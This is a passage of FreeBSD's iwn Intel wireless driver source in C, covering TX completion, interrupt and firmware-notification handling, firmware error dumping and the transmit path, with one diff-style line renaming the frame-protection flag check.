Until traffic is seen * any attempt to transmit is returned immediately with status * set to IWN_TX_FAIL_TX_LOCKED. Unfortunately this can easily * happen on first authenticate after scanning. To workaround * this we ignore a failure of this sort in AUTH state so the * 802.11 layer will fall back to using a timeout to wait for * the AUTH reply. This allows the firmware time to see * traffic so a subsequent retry of AUTH succeeds. It's * unclear why the firmware does not maintain state for * channels recently visited as this would allow immediate * use of the channel after a scan (where we see traffic). */ if (status == IWN_TX_FAIL_TX_LOCKED && ni->ni_vap->iv_state == IEEE80211_S_AUTH) ieee80211_tx_complete(ni, m, 0); else ieee80211_tx_complete(ni, m, (status & IWN_TX_FAIL) != 0); sc->sc_tx_timer = 0; if (--ring->queued < IWN_TX_RING_LOMARK) { sc->qfullmsk &= ~(1 << ring->qid); if (sc->qfullmsk == 0 && (ifp->if_drv_flags & IFF_DRV_OACTIVE)) { ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; iwn_start_locked(ifp); } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } /* * Process a "command done" firmware notification. This is where we wakeup * processes waiting for a synchronous command completion. */ static void iwn_cmd_done(struct iwn_softc *sc, struct iwn_rx_desc *desc) { struct iwn_tx_ring *ring; struct iwn_tx_data *data; int cmd_queue_num; if (sc->sc_flags & IWN_FLAG_PAN_SUPPORT) cmd_queue_num = IWN_PAN_CMD_QUEUE; else cmd_queue_num = IWN_CMD_QUEUE_NUM; if ((desc->qid & IWN_RX_DESC_QID_MSK) != cmd_queue_num) return; /* Not a command ack. */ ring = &sc->txq[cmd_queue_num]; data = &ring->data[desc->idx]; /* If the command was mapped in an mbuf, free it. */ if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } wakeup(&ring->desc[desc->idx]); } static void iwn_ampdu_tx_done(struct iwn_softc *sc, int qid, int idx, int nframes, void *stat) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct iwn_tx_ring *ring = &sc->txq[qid]; struct iwn_tx_data *data; struct mbuf *m; struct iwn_node *wn; struct ieee80211_node *ni; struct ieee80211_tx_ampdu *tap; uint64_t bitmap; uint32_t *status = stat; uint16_t *aggstatus = stat; uint16_t ssn; uint8_t tid; int bit, i, lastidx, *res, seqno, shift, start; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if (nframes == 1) { if ((*status & 0xff) != 1 && (*status & 0xff) != 2) { #ifdef NOT_YET printf("ieee80211_send_bar()\n"); #endif /* * If we completely fail a transmit, make sure a * notification is pushed up to the rate control * layer. 
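 * (Anything other than a firmware status of 1 or 2 is treated here as a
 * completely failed attempt.)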
*/ tap = sc->qid2tap[qid]; tid = tap->txa_tid; wn = (void *)tap->txa_ni; ni = tap->txa_ni; ieee80211_ratectl_tx_complete(ni->ni_vap, ni, IEEE80211_RATECTL_TX_FAILURE, &nframes, NULL); } } bitmap = 0; start = idx; for (i = 0; i < nframes; i++) { if (le16toh(aggstatus[i * 2]) & 0xc) continue; idx = le16toh(aggstatus[2*i + 1]) & 0xff; bit = idx - start; shift = 0; if (bit >= 64) { shift = 0x100 - idx + start; bit = 0; start = idx; } else if (bit <= -64) bit = 0x100 - start + idx; else if (bit < 0) { shift = start - idx; start = idx; bit = 0; } bitmap = bitmap << shift; bitmap |= 1ULL << bit; } tap = sc->qid2tap[qid]; tid = tap->txa_tid; wn = (void *)tap->txa_ni; wn->agg[tid].bitmap = bitmap; wn->agg[tid].startidx = start; wn->agg[tid].nframes = nframes; res = NULL; ssn = 0; if (!IEEE80211_AMPDU_RUNNING(tap)) { res = tap->txa_private; ssn = tap->txa_start & 0xfff; } seqno = le32toh(*(status + nframes)) & 0xfff; for (lastidx = (seqno & 0xff); ring->read != lastidx;) { data = &ring->data[ring->read]; /* Unmap and free mbuf. */ bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m = data->m, data->m = NULL; ni = data->ni, data->ni = NULL; KASSERT(ni != NULL, ("no node")); KASSERT(m != NULL, ("no mbuf")); ieee80211_tx_complete(ni, m, 1); ring->queued--; ring->read = (ring->read + 1) % IWN_TX_RING_COUNT; } if (ring->queued == 0 && res != NULL) { iwn_nic_lock(sc); ops->ampdu_tx_stop(sc, qid, tid, ssn); iwn_nic_unlock(sc); sc->qid2tap[qid] = NULL; free(res, M_DEVBUF); return; } sc->sc_tx_timer = 0; if (ring->queued < IWN_TX_RING_LOMARK) { sc->qfullmsk &= ~(1 << ring->qid); if (sc->qfullmsk == 0 && (ifp->if_drv_flags & IFF_DRV_OACTIVE)) { ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; iwn_start_locked(ifp); } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } /* * Process an INT_FH_RX or INT_SW_RX interrupt. */ static void iwn_notif_intr(struct iwn_softc *sc) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint16_t hw; bus_dmamap_sync(sc->rxq.stat_dma.tag, sc->rxq.stat_dma.map, BUS_DMASYNC_POSTREAD); hw = le16toh(sc->rxq.stat->closed_count) & 0xfff; while (sc->rxq.cur != hw) { struct iwn_rx_data *data = &sc->rxq.data[sc->rxq.cur]; struct iwn_rx_desc *desc; bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); desc = mtod(data->m, struct iwn_rx_desc *); DPRINTF(sc, IWN_DEBUG_RECV, "%s: cur=%d; qid %x idx %d flags %x type %d(%s) len %d\n", __func__, sc->rxq.cur, desc->qid & 0xf, desc->idx, desc->flags, desc->type, iwn_intr_str(desc->type), le16toh(desc->len)); if (!(desc->qid & IWN_UNSOLICITED_RX_NOTIF)) /* Reply to a command. */ iwn_cmd_done(sc, desc); switch (desc->type) { case IWN_RX_PHY: iwn_rx_phy(sc, desc, data); break; case IWN_RX_DONE: /* 4965AGN only. */ case IWN_MPDU_RX_DONE: /* An 802.11 frame has been received. */ iwn_rx_done(sc, desc, data); break; case IWN_RX_COMPRESSED_BA: /* A Compressed BlockAck has been received. */ iwn_rx_compressed_ba(sc, desc, data); break; case IWN_TX_DONE: /* An 802.11 frame has been transmitted. 
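 * This is dispatched through ops->tx_done since the 4965AGN and
 * 5000 series use different status formats.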
*/ ops->tx_done(sc, desc, data); break; case IWN_RX_STATISTICS: case IWN_BEACON_STATISTICS: iwn_rx_statistics(sc, desc, data); break; case IWN_BEACON_MISSED: { struct iwn_beacon_missed *miss = (struct iwn_beacon_missed *)(desc + 1); int misses; bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); misses = le32toh(miss->consecutive); DPRINTF(sc, IWN_DEBUG_STATE, "%s: beacons missed %d/%d\n", __func__, misses, le32toh(miss->total)); /* * If more than 5 consecutive beacons are missed, * reinitialize the sensitivity state machine. */ if (vap->iv_state == IEEE80211_S_RUN && (ic->ic_flags & IEEE80211_F_SCAN) == 0) { if (misses > 5) (void)iwn_init_sensitivity(sc); if (misses >= vap->iv_bmissthreshold) { IWN_UNLOCK(sc); ieee80211_beacon_miss(ic); IWN_LOCK(sc); } } break; } case IWN_UC_READY: { struct iwn_ucode_info *uc = (struct iwn_ucode_info *)(desc + 1); /* The microcontroller is ready. */ bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); DPRINTF(sc, IWN_DEBUG_RESET, "microcode alive notification version=%d.%d " "subtype=%x alive=%x\n", uc->major, uc->minor, uc->subtype, le32toh(uc->valid)); if (le32toh(uc->valid) != 1) { device_printf(sc->sc_dev, "microcontroller initialization failed"); break; } if (uc->subtype == IWN_UCODE_INIT) { /* Save microcontroller report. */ memcpy(&sc->ucode_info, uc, sizeof (*uc)); } /* Save the address of the error log in SRAM. */ sc->errptr = le32toh(uc->errptr); break; } case IWN_STATE_CHANGED: { /* * State change allows hardware switch change to be * noted. However, we handle this in iwn_intr as we * get both the enable/disble intr. */ bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); #ifdef IWN_DEBUG uint32_t *status = (uint32_t *)(desc + 1); DPRINTF(sc, IWN_DEBUG_INTR | IWN_DEBUG_STATE, "state changed to %x\n", le32toh(*status)); #endif break; } case IWN_START_SCAN: { bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); #ifdef IWN_DEBUG struct iwn_start_scan *scan = (struct iwn_start_scan *)(desc + 1); DPRINTF(sc, IWN_DEBUG_ANY, "%s: scanning channel %d status %x\n", __func__, scan->chan, le32toh(scan->status)); #endif break; } case IWN_STOP_SCAN: { bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); #ifdef IWN_DEBUG struct iwn_stop_scan *scan = (struct iwn_stop_scan *)(desc + 1); DPRINTF(sc, IWN_DEBUG_STATE | IWN_DEBUG_SCAN, "scan finished nchan=%d status=%d chan=%d\n", scan->nchan, scan->status, scan->chan); #endif sc->sc_is_scanning = 0; IWN_UNLOCK(sc); ieee80211_scan_next(vap); IWN_LOCK(sc); break; } case IWN5000_CALIBRATION_RESULT: iwn5000_rx_calib_results(sc, desc, data); break; case IWN5000_CALIBRATION_DONE: sc->sc_flags |= IWN_FLAG_CALIB_DONE; wakeup(sc); break; } sc->rxq.cur = (sc->rxq.cur + 1) % IWN_RX_RING_COUNT; } /* Tell the firmware what we have processed. */ hw = (hw == 0) ? IWN_RX_RING_COUNT - 1 : hw - 1; IWN_WRITE(sc, IWN_FH_RX_WPTR, hw & ~7); } /* * Process an INT_WAKEUP interrupt raised when the microcontroller wakes up * from power-down sleep mode. */ static void iwn_wakeup_intr(struct iwn_softc *sc) { int qid; DPRINTF(sc, IWN_DEBUG_RESET, "%s: ucode wakeup from power-down sleep\n", __func__); /* Wakeup RX and TX rings. 
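 * The write pointers are restored from the software state: the RX ring
 * pointer rounded down to a multiple of 8, and qid << 8 | cur for each
 * TX ring.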
*/ IWN_WRITE(sc, IWN_FH_RX_WPTR, sc->rxq.cur & ~7); for (qid = 0; qid < sc->ntxqs; qid++) { struct iwn_tx_ring *ring = &sc->txq[qid]; IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | ring->cur); } } static void iwn_rftoggle_intr(struct iwn_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp = IWN_READ(sc, IWN_GP_CNTRL); IWN_LOCK_ASSERT(sc); device_printf(sc->sc_dev, "RF switch: radio %s\n", (tmp & IWN_GP_CNTRL_RFKILL) ? "enabled" : "disabled"); if (tmp & IWN_GP_CNTRL_RFKILL) ieee80211_runtask(ic, &sc->sc_radioon_task); else ieee80211_runtask(ic, &sc->sc_radiooff_task); } /* * Dump the error log of the firmware when a firmware panic occurs. Although * we can't debug the firmware because it is neither open source nor free, it * can help us to identify certain classes of problems. */ static void iwn_fatal_intr(struct iwn_softc *sc) { struct iwn_fw_dump dump; int i; IWN_LOCK_ASSERT(sc); /* Force a complete recalibration on next init. */ sc->sc_flags &= ~IWN_FLAG_CALIB_DONE; /* Check that the error log address is valid. */ if (sc->errptr < IWN_FW_DATA_BASE || sc->errptr + sizeof (dump) > IWN_FW_DATA_BASE + sc->fw_data_maxsz) { printf("%s: bad firmware error log address 0x%08x\n", __func__, sc->errptr); return; } if (iwn_nic_lock(sc) != 0) { printf("%s: could not read firmware error log\n", __func__); return; } /* Read firmware error log from SRAM. */ iwn_mem_read_region_4(sc, sc->errptr, (uint32_t *)&dump, sizeof (dump) / sizeof (uint32_t)); iwn_nic_unlock(sc); if (dump.valid == 0) { printf("%s: firmware error log is empty\n", __func__); return; } printf("firmware error log:\n"); printf(" error type = \"%s\" (0x%08X)\n", (dump.id < nitems(iwn_fw_errmsg)) ? iwn_fw_errmsg[dump.id] : "UNKNOWN", dump.id); printf(" program counter = 0x%08X\n", dump.pc); printf(" source line = 0x%08X\n", dump.src_line); printf(" error data = 0x%08X%08X\n", dump.error_data[0], dump.error_data[1]); printf(" branch link = 0x%08X%08X\n", dump.branch_link[0], dump.branch_link[1]); printf(" interrupt link = 0x%08X%08X\n", dump.interrupt_link[0], dump.interrupt_link[1]); printf(" time = %u\n", dump.time[0]); /* Dump driver status (TX and RX rings) while we're here. */ printf("driver status:\n"); for (i = 0; i < sc->ntxqs; i++) { struct iwn_tx_ring *ring = &sc->txq[i]; printf(" tx ring %2d: qid=%-2d cur=%-3d queued=%-3d\n", i, ring->qid, ring->cur, ring->queued); } printf(" rx ring: cur=%d\n", sc->rxq.cur); } static void iwn_intr(void *arg) { struct iwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; uint32_t r1, r2, tmp; IWN_LOCK(sc); /* Disable interrupts. */ IWN_WRITE(sc, IWN_INT_MASK, 0); /* Read interrupts from ICT (fast) or from registers (slow). */ if (sc->sc_flags & IWN_FLAG_USE_ICT) { tmp = 0; while (sc->ict[sc->ict_cur] != 0) { tmp |= sc->ict[sc->ict_cur]; sc->ict[sc->ict_cur] = 0; /* Acknowledge. */ sc->ict_cur = (sc->ict_cur + 1) % IWN_ICT_COUNT; } tmp = le32toh(tmp); if (tmp == 0xffffffff) /* Shouldn't happen. */ tmp = 0; else if (tmp & 0xc0000) /* Workaround a HW bug. */ tmp |= 0x8000; r1 = (tmp & 0xff00) << 16 | (tmp & 0xff); r2 = 0; /* Unused. */ } else { r1 = IWN_READ(sc, IWN_INT); if (r1 == 0xffffffff || (r1 & 0xfffffff0) == 0xa5a5a5a0) return; /* Hardware gone! */ r2 = IWN_READ(sc, IWN_FH_INT); } DPRINTF(sc, IWN_DEBUG_INTR, "interrupt reg1=0x%08x reg2=0x%08x\n" , r1, r2); if (r1 == 0 && r2 == 0) goto done; /* Interrupt not for us. */ /* Acknowledge interrupts. 
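 * r1 is written back to IWN_INT; the FH interrupts in r2 only need a
 * separate acknowledgement when ICT is not in use.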
*/ IWN_WRITE(sc, IWN_INT, r1); if (!(sc->sc_flags & IWN_FLAG_USE_ICT)) IWN_WRITE(sc, IWN_FH_INT, r2); if (r1 & IWN_INT_RF_TOGGLED) { iwn_rftoggle_intr(sc); goto done; } if (r1 & IWN_INT_CT_REACHED) { device_printf(sc->sc_dev, "%s: critical temperature reached!\n", __func__); } if (r1 & (IWN_INT_SW_ERR | IWN_INT_HW_ERR)) { device_printf(sc->sc_dev, "%s: fatal firmware error\n", __func__); #ifdef IWN_DEBUG iwn_debug_register(sc); #endif /* Dump firmware error log and stop. */ iwn_fatal_intr(sc); ifp->if_flags &= ~IFF_UP; iwn_stop_locked(sc); goto done; } if ((r1 & (IWN_INT_FH_RX | IWN_INT_SW_RX | IWN_INT_RX_PERIODIC)) || (r2 & IWN_FH_INT_RX)) { if (sc->sc_flags & IWN_FLAG_USE_ICT) { if (r1 & (IWN_INT_FH_RX | IWN_INT_SW_RX)) IWN_WRITE(sc, IWN_FH_INT, IWN_FH_INT_RX); IWN_WRITE_1(sc, IWN_INT_PERIODIC, IWN_INT_PERIODIC_DIS); iwn_notif_intr(sc); if (r1 & (IWN_INT_FH_RX | IWN_INT_SW_RX)) { IWN_WRITE_1(sc, IWN_INT_PERIODIC, IWN_INT_PERIODIC_ENA); } } else iwn_notif_intr(sc); } if ((r1 & IWN_INT_FH_TX) || (r2 & IWN_FH_INT_TX)) { if (sc->sc_flags & IWN_FLAG_USE_ICT) IWN_WRITE(sc, IWN_FH_INT, IWN_FH_INT_TX); wakeup(sc); /* FH DMA transfer completed. */ } if (r1 & IWN_INT_ALIVE) wakeup(sc); /* Firmware is alive. */ if (r1 & IWN_INT_WAKEUP) iwn_wakeup_intr(sc); done: /* Re-enable interrupts. */ if (ifp->if_flags & IFF_UP) IWN_WRITE(sc, IWN_INT_MASK, sc->int_mask); IWN_UNLOCK(sc); } /* * Update TX scheduler ring when transmitting an 802.11 frame (4965AGN and * 5000 adapters use a slightly different format). */ static void iwn4965_update_sched(struct iwn_softc *sc, int qid, int idx, uint8_t id, uint16_t len) { uint16_t *w = &sc->sched[qid * IWN4965_SCHED_COUNT + idx]; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); *w = htole16(len + 8); bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); if (idx < IWN_SCHED_WINSZ) { *(w + IWN_TX_RING_COUNT) = *w; bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); } } static void iwn5000_update_sched(struct iwn_softc *sc, int qid, int idx, uint8_t id, uint16_t len) { uint16_t *w = &sc->sched[qid * IWN5000_SCHED_COUNT + idx]; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); *w = htole16(id << 12 | (len + 8)); bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); if (idx < IWN_SCHED_WINSZ) { *(w + IWN_TX_RING_COUNT) = *w; bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); } } #ifdef notyet static void iwn5000_reset_sched(struct iwn_softc *sc, int qid, int idx) { uint16_t *w = &sc->sched[qid * IWN5000_SCHED_COUNT + idx]; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); *w = (*w & htole16(0xf000)) | htole16(1); bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); if (idx < IWN_SCHED_WINSZ) { *(w + IWN_TX_RING_COUNT) = *w; bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); } } #endif /* * Check whether OFDM 11g protection will be enabled for the given rate. * * The original driver code only enabled protection for OFDM rates. * It didn't check to see whether it was operating in 11a or 11bg mode. */ static int iwn_check_rate_needs_protection(struct iwn_softc *sc, struct ieee80211vap *vap, uint8_t rate) { struct ieee80211com *ic = vap->iv_ic; /* * Not in 2GHz mode? Then there's no need to enable OFDM * 11bg protection. */ if (! IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { return (0); } /* * 11bg protection not enabled? Then don't use it. 
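 * (net80211 sets IEEE80211_F_USEPROT when the BSS currently requires
 * ERP protection.)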
*/ if ((ic->ic_flags & IEEE80211_F_USEPROT) == 0) return (0); /* * If it's an 11n rate, then for now we enable * protection. */ if (rate & IEEE80211_RATE_MCS) { return (1); } /* * Do a rate table lookup. If the PHY is CCK, * don't do protection. */ if (ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_CCK) return (0); /* * Yup, enable protection. */ return (1); } /* * return a value between 0 and IWN_MAX_TX_RETRIES-1 as an index into * the link quality table that reflects this particular entry. */ static int iwn_tx_rate_to_linkq_offset(struct iwn_softc *sc, struct ieee80211_node *ni, uint8_t rate) { struct ieee80211_rateset *rs; int is_11n; int nr; int i; uint8_t cmp_rate; /* * Figure out if we're using 11n or not here. */ if (IEEE80211_IS_CHAN_HT(ni->ni_chan) && ni->ni_htrates.rs_nrates > 0) is_11n = 1; else is_11n = 0; /* * Use the correct rate table. */ if (is_11n) { rs = (struct ieee80211_rateset *) &ni->ni_htrates; nr = ni->ni_htrates.rs_nrates; } else { rs = &ni->ni_rates; nr = rs->rs_nrates; } /* * Find the relevant link quality entry in the table. */ for (i = 0; i < nr && i < IWN_MAX_TX_RETRIES - 1 ; i++) { /* * The link quality table index starts at 0 == highest * rate, so we walk the rate table backwards. */ cmp_rate = rs->rs_rates[(nr - 1) - i]; if (rate & IEEE80211_RATE_MCS) cmp_rate |= IEEE80211_RATE_MCS; #if 0 DPRINTF(sc, IWN_DEBUG_XMIT, "%s: idx %d: nr=%d, rate=0x%02x, rateentry=0x%02x\n", __func__, i, nr, rate, cmp_rate); #endif if (cmp_rate == rate) return (i); } /* Failed? Start at the end */ return (IWN_MAX_TX_RETRIES - 1); } static int iwn_tx_data(struct iwn_softc *sc, struct mbuf *m, struct ieee80211_node *ni) { struct iwn_ops *ops = &sc->ops; const struct ieee80211_txparam *tp; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct iwn_node *wn = (void *)ni; struct iwn_tx_ring *ring; struct iwn_tx_desc *desc; struct iwn_tx_data *data; struct iwn_tx_cmd *cmd; struct iwn_cmd_data *tx; struct ieee80211_frame *wh; struct ieee80211_key *k = NULL; struct mbuf *m1; uint32_t flags; uint16_t qos; u_int hdrlen; bus_dma_segment_t *seg, segs[IWN_MAX_SCATTER]; uint8_t tid, type; int ac, i, totlen, error, pad, nsegs = 0, rate; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); IWN_LOCK_ASSERT(sc); wh = mtod(m, struct ieee80211_frame *); hdrlen = ieee80211_anyhdrsize(wh); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; /* Select EDCA Access Category and TX ring for this frame. */ if (IEEE80211_QOS_HAS_SEQ(wh)) { qos = ((const struct ieee80211_qosframe *)wh)->i_qos[0]; tid = qos & IEEE80211_QOS_TID; } else { qos = 0; tid = 0; } ac = M_WME_GETAC(m); if (m->m_flags & M_AMPDU_MPDU) { uint16_t seqno; struct ieee80211_tx_ampdu *tap = &ni->ni_tx_ampdu[ac]; if (!IEEE80211_AMPDU_RUNNING(tap)) { m_freem(m); return EINVAL; } /* * Queue this frame to the hardware ring that we've * negotiated AMPDU TX on. * * Note that the sequence number must match the TX slot * being used! */ ac = *(int *)tap->txa_private; seqno = ni->ni_txseqs[tid]; *(uint16_t *)wh->i_seq = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); ring = &sc->txq[ac]; if ((seqno % 256) != ring->cur) { device_printf(sc->sc_dev, "%s: m=%p: seqno (%d) (%d) != ring index (%d) !\n", __func__, m, seqno, seqno % 256, ring->cur); } ni->ni_txseqs[tid]++; } ring = &sc->txq[ac]; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; /* Choose a TX rate index. 
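 *
 * Management and EAPOL frames go out at the fixed management rate,
 * multicast frames at the multicast rate, a user-fixed unicast rate is
 * honoured if set, and everything else asks the rate control module.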
*/ tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (type == IEEE80211_FC0_TYPE_MGT) rate = tp->mgmtrate; else if (IEEE80211_IS_MULTICAST(wh->i_addr1)) rate = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = tp->ucastrate; else if (m->m_flags & M_EAPOL) rate = tp->mgmtrate; else { /* XXX pass pktlen */ (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } /* Encrypt the frame if need be. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { /* Retrieve key for TX. */ k = ieee80211_crypto_encap(ni, m); if (k == NULL) { m_freem(m); return ENOBUFS; } /* 802.11 header may have moved. */ wh = mtod(m, struct ieee80211_frame *); } totlen = m->m_pkthdr.len; if (ieee80211_radiotap_active_vap(vap)) { struct iwn_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; if (k != NULL) tap->wt_flags |= IEEE80211_RADIOTAP_F_WEP; ieee80211_radiotap_tx(vap, m); } /* Prepare TX firmware command. */ cmd = &ring->cmd[ring->cur]; cmd->code = IWN_CMD_TX_DATA; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; tx = (struct iwn_cmd_data *)cmd->data; /* NB: No need to clear tx, all fields are reinitialized here. */ tx->scratch = 0; /* clear "scratch" area */ flags = 0; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { /* Unicast frame, check if an ACK is expected. */ if (!qos || (qos & IEEE80211_QOS_ACKPOLICY) != IEEE80211_QOS_ACKPOLICY_NOACK) flags |= IWN_TX_NEED_ACK; } if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_CTL | IEEE80211_FC0_SUBTYPE_BAR)) flags |= IWN_TX_IMM_BA; /* Cannot happen yet. */ if (wh->i_fc[1] & IEEE80211_FC1_MORE_FRAG) flags |= IWN_TX_MORE_FRAG; /* Cannot happen yet. */ /* Check if frame must be protected using RTS/CTS or CTS-to-self. */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { /* NB: Group frames are sent using CCK in 802.11b/g. */ if (totlen + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) { flags |= IWN_TX_NEED_RTS; } else if (iwn_check_rate_needs_protection(sc, vap, rate)) { if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) flags |= IWN_TX_NEED_CTS; else if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) flags |= IWN_TX_NEED_RTS; } /* XXX HT protection? */ if (flags & (IWN_TX_NEED_RTS | IWN_TX_NEED_CTS)) { if (sc->hw_type != IWN_HW_REV_TYPE_4965) { /* 5000 autoselects RTS/CTS or CTS-to-self. */ flags &= ~(IWN_TX_NEED_RTS | IWN_TX_NEED_CTS); flags |= IWN_TX_NEED_PROTECTION; } else flags |= IWN_TX_FULL_TXOP; } } if (IEEE80211_IS_MULTICAST(wh->i_addr1) || type != IEEE80211_FC0_TYPE_DATA) tx->id = sc->broadcast_id; else tx->id = wn->id; if (type == IEEE80211_FC0_TYPE_MGT) { uint8_t subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* Tell HW to set timestamp in probe responses. */ if (subtype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) flags |= IWN_TX_INSERT_TSTAMP; if (subtype == IEEE80211_FC0_SUBTYPE_ASSOC_REQ || subtype == IEEE80211_FC0_SUBTYPE_REASSOC_REQ) tx->timeout = htole16(3); else tx->timeout = htole16(2); } else tx->timeout = htole16(0); if (hdrlen & 3) { /* First segment length must be a multiple of 4. */ flags |= IWN_TX_NEED_PADDING; pad = 4 - (hdrlen & 3); } else pad = 0; tx->len = htole16(totlen); tx->tid = tid; tx->rts_ntries = 60; tx->data_ntries = 15; tx->lifetime = htole32(IWN_LIFETIME_INFINITE); tx->rate = iwn_rate_to_plcp(sc, ni, rate); if (tx->id == sc->broadcast_id) { /* Group or management frame. 
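 * No link quality (MRR) table entry is used for these; they are sent
 * only at the rate programmed in tx->rate.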
*/ tx->linkq = 0; } else { tx->linkq = iwn_tx_rate_to_linkq_offset(sc, ni, rate); flags |= IWN_TX_LINKQ; /* enable MRR */ } /* Set physical address of "scratch area". */ tx->loaddr = htole32(IWN_LOADDR(data->scratch_paddr)); tx->hiaddr = IWN_HIADDR(data->scratch_paddr); /* Copy 802.11 header in TX command. */ memcpy((uint8_t *)(tx + 1), wh, hdrlen); /* Trim 802.11 header. */ m_adj(m, hdrlen); tx->security = 0; tx->flags = htole32(flags); error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { if (error != EFBIG) { device_printf(sc->sc_dev, "%s: can't map mbuf (error %d)\n", __func__, error); m_freem(m); return error; } /* Too many DMA segments, linearize mbuf. */ m1 = m_collapse(m, M_NOWAIT, IWN_MAX_SCATTER); if (m1 == NULL) { device_printf(sc->sc_dev, "%s: could not defrag mbuf\n", __func__); m_freem(m); return ENOBUFS; } m = m1; error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "%s: can't map mbuf (error %d)\n", __func__, error); m_freem(m); return error; } } data->m = m; data->ni = ni; DPRINTF(sc, IWN_DEBUG_XMIT, "%s: qid %d idx %d len %d nsegs %d rate %04x plcp 0x%08x\n", __func__, ring->qid, ring->cur, m->m_pkthdr.len, nsegs, rate, tx->rate); /* Fill TX descriptor. */ desc->nsegs = 1; if (m->m_len != 0) desc->nsegs += nsegs; /* First DMA segment is used by the TX command. */ desc->segs[0].addr = htole32(IWN_LOADDR(data->cmd_paddr)); desc->segs[0].len = htole16(IWN_HIADDR(data->cmd_paddr) | (4 + sizeof (*tx) + hdrlen + pad) << 4); /* Other DMA segments are for data payload. */ seg = &segs[0]; for (i = 1; i <= nsegs; i++) { desc->segs[i].addr = htole32(IWN_LOADDR(seg->ds_addr)); desc->segs[i].len = htole16(IWN_HIADDR(seg->ds_addr) | seg->ds_len << 4); seg++; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->data_dmat, ring->cmd_dma.map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); /* Update TX scheduler. */ if (ring->qid >= sc->firstaggqueue) ops->update_sched(sc, ring->qid, ring->cur, tx->id, totlen); /* Kick TX ring. */ ring->cur = (ring->cur + 1) % IWN_TX_RING_COUNT; IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, ring->qid << 8 | ring->cur); /* Mark TX ring as full if we reach a certain threshold. */ if (++ring->queued > IWN_TX_RING_HIMARK) sc->qfullmsk |= 1 << ring->qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; } static int iwn_tx_data_raw(struct iwn_softc *sc, struct mbuf *m, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct iwn_ops *ops = &sc->ops; // struct ifnet *ifp = sc->sc_ifp; struct ieee80211vap *vap = ni->ni_vap; // struct ieee80211com *ic = ifp->if_l2com; struct 